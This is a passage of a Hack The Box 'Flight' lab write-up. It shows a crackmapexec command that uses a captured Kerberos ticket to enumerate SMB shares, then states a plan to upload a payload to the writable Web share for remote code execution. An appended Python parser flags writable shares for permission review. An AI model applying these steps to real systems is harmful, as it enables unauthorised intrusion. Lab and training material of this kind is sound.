c.bum Session


Checking for SMB access of the c.bum user with the TGT

┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ KRB5CCNAME=c.bum@g0.flight.htb.ccache crackmapexec smb g0.flight.htb -k --use-kcache --kdcHost g0.flight.htb --shares
smb         g0.flight.htb   445    g0               [*] windows 10.0 build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         g0.flight.htb   445    G0               [+] flight.htb\ from ccache 
SMB         g0.flight.htb   445    G0               [+] Enumerated shares
SMB         g0.flight.htb   445    G0               Share           Permissions     Remark
SMB         g0.flight.htb   445    G0               -----           -----------     ------
SMB         g0.flight.htb   445    G0               ADMIN$                          Remote Admin
SMB         g0.flight.htb   445    G0               C$                              Default share
SMB         g0.flight.htb   445    G0               IPC$            READ            Remote IPC
SMB         g0.flight.htb   445    G0               NETLOGON        READ            Logon server share 
SMB         g0.flight.htb   445    G0               Shared          READ,WRITE      
SMB         g0.flight.htb   445    G0               SYSVOL          READ            Logon server share 
SMB         g0.flight.htb   445    G0               Users           READ            
SMB         g0.flight.htb   445    G0               Web             READ,WRITE      

The c.bum user has write access to the \\g0.flight.htb\Web share. The share has already been enumerated and identified as hosting the web root directory for those 2 web applications.

Now that write access is granted as the c.bum user, I can upload (write) a payload to one of the web app directories for remote code execution.
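
Added example, not part of the original notes: a small parser for the share table above that lists which non-default shares an account can write to, so their ACLs can be reviewed. It slices rows at the header's column offsets because the Permissions column can be empty; the names `parse_shares`, `writable_for_review` and `DEFAULT_SHARES` are hypothetical, and the sample rows are constructed to mirror the output above.

```python
import re

# Header columns give the slice offsets; Permissions may be blank, so
# whitespace splitting would misread "ADMIN$ ... Remote Admin".
HEADER = re.compile(r"(Share)\s+(Permissions)\s+(Remark)")
# Assumption: built-in Windows/DC shares that are not flagged here.
DEFAULT_SHARES = {"ADMIN$", "C$", "IPC$", "NETLOGON", "SYSVOL"}

def parse_shares(output):
    """Return one dict per share row of a --shares table."""
    cols, shares = None, []
    for line in output.splitlines():
        if cols is None:                      # skip banner lines until the header
            m = HEADER.search(line)
            if m:
                cols = (m.start(1), m.start(2), m.start(3))
            continue
        name = line[cols[0]:cols[1]].strip()
        perms = line[cols[1]:cols[2]].strip()
        if not name or set(name) == {"-"}:    # blank line or the dashed rule
            continue
        shares.append({"name": name,
                       "perms": {p for p in perms.split(",") if p},
                       "remark": line[cols[2]:].strip()})
    return shares

def writable_for_review(shares):
    """Names of non-default shares the account can write to."""
    return sorted(s["name"] for s in shares
                  if "WRITE" in s["perms"] and s["name"] not in DEFAULT_SHARES)

# Constructed sample mirroring the table above (same shares and permissions).
_PREFIX = "SMB         g0.flight.htb   445    G0               "
_ROWS = [("Share", "Permissions", "Remark"), ("-----", "-----------", "------"),
         ("ADMIN$", "", "Remote Admin"), ("C$", "", "Default share"),
         ("IPC$", "READ", "Remote IPC"), ("NETLOGON", "READ", "Logon server share"),
         ("Shared", "READ,WRITE", ""), ("SYSVOL", "READ", "Logon server share"),
         ("Users", "READ", ""), ("Web", "READ,WRITE", "")]
SAMPLE = "\n".join(_PREFIX + f"{a:<16}{b:<16}{c}" for a, b, c in _ROWS)

if __name__ == "__main__":
    for share in writable_for_review(parse_shares(SAMPLE)):
        print(f"review write ACL: {share}")
```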